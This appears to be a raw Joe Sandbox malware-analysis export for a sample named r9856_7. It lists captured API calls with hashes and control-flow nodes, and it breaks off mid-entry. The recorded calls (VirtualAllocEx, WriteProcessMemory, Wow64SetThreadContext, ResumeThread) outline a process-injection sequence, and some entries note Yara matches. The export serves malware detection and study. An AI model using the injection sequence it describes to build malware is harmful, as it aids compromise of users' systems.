                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 986b96edeca62d84a30ac4ad300e98d63d652229afe7314e88d8513ba5204db8
                                                                • Instruction ID: a3c2d7f3165acf3d12d34d438f54e1f03278e04a4444e4496397a142daa83ca3
                                                                • Opcode Fuzzy Hash: 986b96edeca62d84a30ac4ad300e98d63d652229afe7314e88d8513ba5204db8
                                                                • Instruction Fuzzy Hash: 01811370A00B058FD724DF2AD45579ABBF2FF88208F00892DD49AD7B50DB75E849CB95

                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 02E759C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 695a838af3ac47017f42bbfce22651784cb3d5e49180a5d45f23f4839980a7eb
                                                                • Instruction ID: 22c183cf1e290eb5e970a24a02d66d459aef92f874004e3c322b642f7980f9fa
                                                                • Opcode Fuzzy Hash: 695a838af3ac47017f42bbfce22651784cb3d5e49180a5d45f23f4839980a7eb
                                                                • Instruction Fuzzy Hash: A741E371C0071DCBEB24DFA9C884B9EBBF5BF49318F60816AD408AB251DB756946CF90

                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 02E759C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 5abfd9fc3368e1c0264390ef28eb2d4265c84546dcc1f6990182ec3296c8d922
                                                                • Instruction ID: 3d93f942b9fb5f80e279c7df1cddce3e378d50aade3ec54a9ff0ffd95a2991c7
                                                                • Opcode Fuzzy Hash: 5abfd9fc3368e1c0264390ef28eb2d4265c84546dcc1f6990182ec3296c8d922
                                                                • Instruction Fuzzy Hash: 0D41F2B1C0071ACBEB24CFA9C8857CEBBF1BF49314F60816AD408AB250DB755946CF50

                                                                APIs
                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 072DD945
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: MessagePost
                                                                • String ID:
                                                                • API String ID: 410705778-0
                                                                • Opcode ID: fcdd79942fb61b728ca2dfb1bc1970a74b4b84fd1787a2208339cb19eec83d93
                                                                • Instruction ID: 66f31c988ec6990b20a74e48988833693171517e433c6136f22f4cddf8a9b256
                                                                • Opcode Fuzzy Hash: fcdd79942fb61b728ca2dfb1bc1970a74b4b84fd1787a2208339cb19eec83d93
                                                                • Instruction Fuzzy Hash: DB3105B59003499FDB10DF9AD885BDEFBF8EB48324F10841AE558A7640C375A944CFA1

                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072DA5D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 6ad3c15d27a972a138f7fd573215a269a21bf64af033b22874e85ad37dcc37cf
                                                                • Instruction ID: b7c4eb3a5332314f7de09fe1cebaf2b6e0da494ed47a66d5af299e20a99970b9
                                                                • Opcode Fuzzy Hash: 6ad3c15d27a972a138f7fd573215a269a21bf64af033b22874e85ad37dcc37cf
                                                                • Instruction Fuzzy Hash: 302122B1D1034A9FDB10CFA9C885BEEBBF1BF48310F14882AE959A7241C7799955CB60

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 590 72da548-72da596 592 72da598-72da5a4 590->592 593 72da5a6-72da5e5 WriteProcessMemory 590->593 592->593 595 72da5ee-72da61e 593->595 596 72da5e7-72da5ed 593->596 596->595
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072DA5D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 653cc310605ab3bb1e2bdb116028ff007063a278268b6a729f21560f6c365197
                                                                • Instruction ID: 20bc90049666cb6a3ab7e96a1c53e636a359e2e5a783e2da372b53e74cfcff71
                                                                • Opcode Fuzzy Hash: 653cc310605ab3bb1e2bdb116028ff007063a278268b6a729f21560f6c365197
                                                                • Instruction Fuzzy Hash: B32155B1D103099FDB10CFAAC881BDEBBF5FF48310F10842AE919A7240C778A944CBA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 606 72da630-72da6c5 ReadProcessMemory 609 72da6ce-72da6fe 606->609 610 72da6c7-72da6cd 606->610 610->609
                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072DA6B8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: c03a55414627d720eb1f6acd2872a03b0c172a4478a021dabe5fd06814804759
                                                                • Instruction ID: 14572d9638cba0fa446520930dd6893041c90108b802b62c0b9c825fac361020
                                                                • Opcode Fuzzy Hash: c03a55414627d720eb1f6acd2872a03b0c172a4478a021dabe5fd06814804759
                                                                • Instruction Fuzzy Hash: 9B2126B1D013499FDB10DFA9C881BEEBBF5BF48310F54882EE959A7240C7349905CBA0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 600 2e7d27c-2e7d724 DuplicateHandle 602 2e7d726-2e7d72c 600->602 603 2e7d72d-2e7d74a 600->603 602->603
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E7D656,?,?,?,?,?), ref: 02E7D717
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 470dc44d330b461f74d4b49797926e2b073d6a9c2513b106bf283b31b9ab9c85
                                                                • Instruction ID: c152f1f9194b1c975df3e0220414dc5cdb0dc0ee92b97b97737c5c0e2907f1dd
                                                                • Opcode Fuzzy Hash: 470dc44d330b461f74d4b49797926e2b073d6a9c2513b106bf283b31b9ab9c85
                                                                • Instruction Fuzzy Hash: 072103B5D003489FDB10CF9AD885ADEBBF8FB48314F14801AE918A3310C374A940CFA4
                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072DA6B8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: c026f367f557546a7ed2c746271a527b1c449fce50454b16feee428a52d4ea2a
                                                                • Instruction ID: c2ee470e24648e29c6b0afcaf79cb41d18171d645d4435c5ce477d8482004a27
                                                                • Opcode Fuzzy Hash: c026f367f557546a7ed2c746271a527b1c449fce50454b16feee428a52d4ea2a
                                                                • Instruction Fuzzy Hash: 742116B1C003499FDB10DFAAC881BDEBBF5FF48310F508429E959A7240C7399941CBA4

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 614 72da3b0-72da3fb 616 72da3fd-72da409 614->616 617 72da40b-72da43b Wow64SetThreadContext 614->617 616->617 619 72da43d-72da443 617->619 620 72da444-72da474 617->620 619->620
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072DA42E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: ec7eb6e65731d63835d46c932f1a836fab9c7d83cdc6f44a7a6d26f1bf682c45
                                                                • Instruction ID: 46ff2a866e71769fb302d42ec12344c97e8a1d640ce84c55b4faa944b75e1d5f
                                                                • Opcode Fuzzy Hash: ec7eb6e65731d63835d46c932f1a836fab9c7d83cdc6f44a7a6d26f1bf682c45
                                                                • Instruction Fuzzy Hash: 922115B1D103098FDB10DFAAC489BAEBBF4EF48324F54C42AD559A7240CB789945CFA5
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E7D656,?,?,?,?,?), ref: 02E7D717
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 48d19b1cbad38b4c281773a2c798414981da7778f208cae1a11d20d86d2a5385
                                                                • Instruction ID: dcca87b7726baf6aa81d0fb0c34f9cae77bd38fe333f498b2a983256d6b98c9e
                                                                • Opcode Fuzzy Hash: 48d19b1cbad38b4c281773a2c798414981da7778f208cae1a11d20d86d2a5385
                                                                • Instruction Fuzzy Hash: C521E3B5D002499FDB10CF99D985ADEBBF5EF48314F14841AE954B3350D374A945CF60
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072DA4F6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 3ec5d5635f14ba709df3ca81781287fbc156af81d6096b7e42bce8ad70a8a94c
                                                                • Instruction ID: be1460a2782a20f1e74e80c1c7e619bdce2ab4e6501964f97e3379d57168ff2b
                                                                • Opcode Fuzzy Hash: 3ec5d5635f14ba709df3ca81781287fbc156af81d6096b7e42bce8ad70a8a94c
                                                                • Instruction Fuzzy Hash: F6115672D003498FDB20DFAAC845BEEBFF5AF48310F24881AE569A7250C7359945CFA0
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072DA4F6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 27cb0226a449ee0e5d1598d1ec569885ef96cba5f742e89649c78aedd05e4e1f
                                                                • Instruction ID: d277af46f757e267978638bf60e3d0ce76b04113a1d66bf8f75b33f62ae6e5bf
                                                                • Opcode Fuzzy Hash: 27cb0226a449ee0e5d1598d1ec569885ef96cba5f742e89649c78aedd05e4e1f
                                                                • Instruction Fuzzy Hash: 9C112675C003499FDB20DFAAC845BDEBBF5EB48320F148419E565A7250CB759940CFA4
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 0a46a02a5de843a824edabe643184e1cdb0caeb4a9fb0162e144ede30ed3f585
                                                                • Instruction ID: bda7e72b0cd27374917f05bd49c55985b4f898d601a4fd23834bd867a0d2a547
                                                                • Opcode Fuzzy Hash: 0a46a02a5de843a824edabe643184e1cdb0caeb4a9fb0162e144ede30ed3f585
                                                                • Instruction Fuzzy Hash: C01158B1D003498FDB20DFAAC845BEEFBF5EB48320F248419D559A7640CB796945CFA4
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 2f15ee37dc1fdf97fa58f6c655927b1f9b09698fc188f12271a92e4ebd326cbc
                                                                • Instruction ID: ad621d8893c34fab3a97b602f05f8785c9d1cf0a0b89b511543df1b02315f908
                                                                • Opcode Fuzzy Hash: 2f15ee37dc1fdf97fa58f6c655927b1f9b09698fc188f12271a92e4ebd326cbc
                                                                • Instruction Fuzzy Hash: A6113AB1D003498FDB20DFAAC445B9EFBF5EB48324F148419D559A7240CB796945CF94
                                                                APIs
                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 072DD945
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: MessagePost
                                                                • String ID:
                                                                • API String ID: 410705778-0
                                                                • Opcode ID: 0fe9da2b44694f66574d0e2ca6383bad7d1976740a067573fe393f1aea285506
                                                                • Instruction ID: 319b6a3be4b5f4e0a64ad4fd927396a318b7cbf93729b2431cd8b5a86180d22c
                                                                • Opcode Fuzzy Hash: 0fe9da2b44694f66574d0e2ca6383bad7d1976740a067573fe393f1aea285506
                                                                • Instruction Fuzzy Hash: FB1106B59107499FDB10DF9AC885BDEBBF8FB48324F10841AE558A7200C375A944CFA5
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02E7AFFE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 47f95923ffb6cee5e3d3d545302b78d6e3c09cde88582ffbe0bce77a0d15132d
                                                                • Instruction ID: 32f05c59b76648f3bb4b95b70ebcc6ebebe6fd000fdce30eead3b9b33465df3d
                                                                • Opcode Fuzzy Hash: 47f95923ffb6cee5e3d3d545302b78d6e3c09cde88582ffbe0bce77a0d15132d
                                                                • Instruction Fuzzy Hash: 371102B6C002498FCB20CF9AC444B9EFBF4AB48318F10842AD529A7210D375A545CFA1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f04849b4209a451cd2cfd759f39b4dafb06ebab84ab960c81e88e14a58a14668
                                                                • Instruction ID: 68aea644b1ea4ff4345bea9d6cadfe12c3c6542c8fe7da0edbe1555dad486223
                                                                • Opcode Fuzzy Hash: f04849b4209a451cd2cfd759f39b4dafb06ebab84ab960c81e88e14a58a14668
                                                                • Instruction Fuzzy Hash: FCE1F9B4E102198FDB14CF99C580AAEBBF6FF89304F248169E454AB355D735AD81CFA0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 97715f7cab740ad842a7b919641d9fdf16c926729ac14a8e0f9e9decbd921b54
                                                                • Instruction ID: 3e0cccb796b59d5803cf0a806d4bb59c2dc970048d691842c87be24a373319d5
                                                                • Opcode Fuzzy Hash: 97715f7cab740ad842a7b919641d9fdf16c926729ac14a8e0f9e9decbd921b54
                                                                • Instruction Fuzzy Hash: B9E1EAB4E102198FDB14CFA9C580AAEBBF6FF89304F248169E454A7355D735AD81CFA0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: df9b3032c68b7415631f0711795db557e346bd58a49198fb8553d8bd457eda8e
                                                                • Instruction ID: 63b1b6f7be05070f0d35f99b87fb151fa8260e168343d24186c1ae87c6a981ea
                                                                • Opcode Fuzzy Hash: df9b3032c68b7415631f0711795db557e346bd58a49198fb8553d8bd457eda8e
                                                                • Instruction Fuzzy Hash: 6AE1D6B4E102198FDB14CFA9C680AAEBBF6FF89314F248169D454AB355D734AD41CFA0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2da441688d6c110319b1270c29c4f145c22099ade27d77be7fffdb203cc0470b
                                                                • Instruction ID: a011f5a0433b8dc5cc397fdcd87d5257cd332ce5c86afaf2774cf359620f030e
                                                                • Opcode Fuzzy Hash: 2da441688d6c110319b1270c29c4f145c22099ade27d77be7fffdb203cc0470b
                                                                • Instruction Fuzzy Hash: 8CE129B4E102598FDB14DFA9C580AAEBBF6FF89304F248169E444A7355D734AD81CFA0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1385451724.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dc6c3e0180f90eb96060585eef7fc5e07038d188130ff9c304a9f429df6587d9
                                                                • Instruction ID: 763183a08ecf79e541227a787f1cfd60c7f85f92a7016d4562859981afe0ce0e
                                                                • Opcode Fuzzy Hash: dc6c3e0180f90eb96060585eef7fc5e07038d188130ff9c304a9f429df6587d9
                                                                • Instruction Fuzzy Hash: 25A1BE32E50209CFCF05DFB4C84499EB7B2FF85304B25856AE805AB665DB71E916CF90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9630fea644f7fb66b7edb68bd9ee73422eeddcf43d8a2cebca566fdc043a3ebf
                                                                • Instruction ID: 22147c8872319de3c726111b0744460f39cdba2b878887e1234b05cc5c4627bb
                                                                • Opcode Fuzzy Hash: 9630fea644f7fb66b7edb68bd9ee73422eeddcf43d8a2cebca566fdc043a3ebf
                                                                • Instruction Fuzzy Hash: E05129B4E142198BDB14CFA9C9805AEFBF6FF89200F24816AD458AB355C734AD41CFA1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1389240728.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_72d0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49a8b581bca56fe771ab8c4f363930db0f1c67c25290244f1ae6e9de91a1a9a4
                                                                • Instruction ID: 58731ec5b09abe78178c7053bbea20a63f378f555620ad2479865d7b8cce5c57
                                                                • Opcode Fuzzy Hash: 49a8b581bca56fe771ab8c4f363930db0f1c67c25290244f1ae6e9de91a1a9a4
                                                                • Instruction Fuzzy Hash: 395129B4E102198BDB14CFA9C9406AEFBF6FF89300F248169D858A7355D7359E41CFA1

                                                                Execution Graph

                                                                Execution Coverage:1.2%
                                                                Dynamic/Decrypted Code Coverage:4.6%
                                                                Signature Coverage:7.2%
                                                                Total number of Nodes:152
                                                                Total number of Limit Nodes:14

                                                                Control-flow Graph

                                                                control_flow_graph 98 4173f3-41740f 99 417417-41741c 98->99 100 417412 call 42ef83 98->100 101 417422-417430 call 42f583 99->101 102 41741e-417421 99->102 100->99 105 417440-417451 call 42d903 101->105 106 417432-41743d call 42f823 101->106 111 417453-417467 LdrLoadDll 105->111 112 41746a-41746d 105->112 106->105 111->112
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417465
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
                                                                • Instruction ID: cafd0f0782c66a26ed3eed41a317cb9385757514b29da0ef47942da2ec99165b
                                                                • Opcode Fuzzy Hash: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
                                                                • Instruction Fuzzy Hash: DD015EB1E0020DBBDF10DAE1EC42FDEB7789B14308F4041AAE90897241F634EB588B95

                                                                Control-flow Graph

                                                                control_flow_graph 118 42c1a3-42c1df call 404993 call 42d413 NtClose
                                                                APIs
                                                                • NtClose.NTDLL(004245C4,?,96AB6DDB,?,?,004245C4,?), ref: 0042C1DA
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 9c513eafea19e212686e57a6e679e6276b6313a6f199c2cd6f68de667cf9f15e
                                                                • Instruction ID: 816ff1ec058514d28674ed5d053f4b8b5415fc4108edde945f024827e12296bb
                                                                • Opcode Fuzzy Hash: 9c513eafea19e212686e57a6e679e6276b6313a6f199c2cd6f68de667cf9f15e
                                                                • Instruction Fuzzy Hash: 20E04FB16042147BD620BA6AEC01F9BB75DDBC5714F01402AFA0CA7241C771B91186A4

                                                                Control-flow Graph

                                                                control_flow_graph 132 1122b60-1122b6c LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 61836e97ad0cbf163ac07236349381f3a9a7d457a9d9acdf7c319f4a461f73a8
                                                                • Instruction ID: 505b9d8c3e52544a30161f268202c9d280ed9e0321c7438c4a947b5a3ed3b874
                                                                • Opcode Fuzzy Hash: 61836e97ad0cbf163ac07236349381f3a9a7d457a9d9acdf7c319f4a461f73a8
                                                                • Instruction Fuzzy Hash: C690026120240003450972584514616501A97E0201B55C121F1019590DC62589927225
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: b5bd61b1da55638604b28812931f6a04a37d5e5e64c3475905505c7bd36a9322
                                                                • Instruction ID: e1fddb673f2be0ca53276839bd452b7e5ad0cdb08347af23e11e74a71b5f025b
                                                                • Opcode Fuzzy Hash: b5bd61b1da55638604b28812931f6a04a37d5e5e64c3475905505c7bd36a9322
                                                                • Instruction Fuzzy Hash: 1190023120140413D51572584604707101997D0241F95C512B0429558DD7568A53B221

                                                                Control-flow Graph

                                                                control_flow_graph 133 1122c70-1122c7c LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 510f6348a4ccee0e48eae253c6976a8b75c3c88d2b689bd26606c9c11393122d
                                                                • Instruction ID: c099d50911fa8e872c9bffbfd2fd4f2f1ed6e56d4b24c3ad2f10dfb057adc6d6
                                                                • Opcode Fuzzy Hash: 510f6348a4ccee0e48eae253c6976a8b75c3c88d2b689bd26606c9c11393122d
                                                                • Instruction Fuzzy Hash: 5090023120148802D5147258850474A101597D0301F59C511B4429658DC79589927221
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3045e752591c9302c174fda39f03668ae5ab675ae19d6606bbaf77d6a25a7495
                                                                • Instruction ID: e03dd4fa2bf916ffef11fa46db0b4445a30cf07117a34fe683369122f974121b
                                                                • Opcode Fuzzy Hash: 3045e752591c9302c174fda39f03668ae5ab675ae19d6606bbaf77d6a25a7495
                                                                • Instruction Fuzzy Hash: 7490023160550402D50472584614706201597D0201F65C511B0429568DC7958A5276A2

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00413D10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_r9856_7.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                • Opcode ID: 175d564f5e2082ac18ee0e7691373d5f1b56a62285362adcd5aaadc332369405
                                                                • Instruction ID: 64a1c55ae4458a7ebde12d920371f3fbb3e1541addc965c4ee9526edd9f5af75
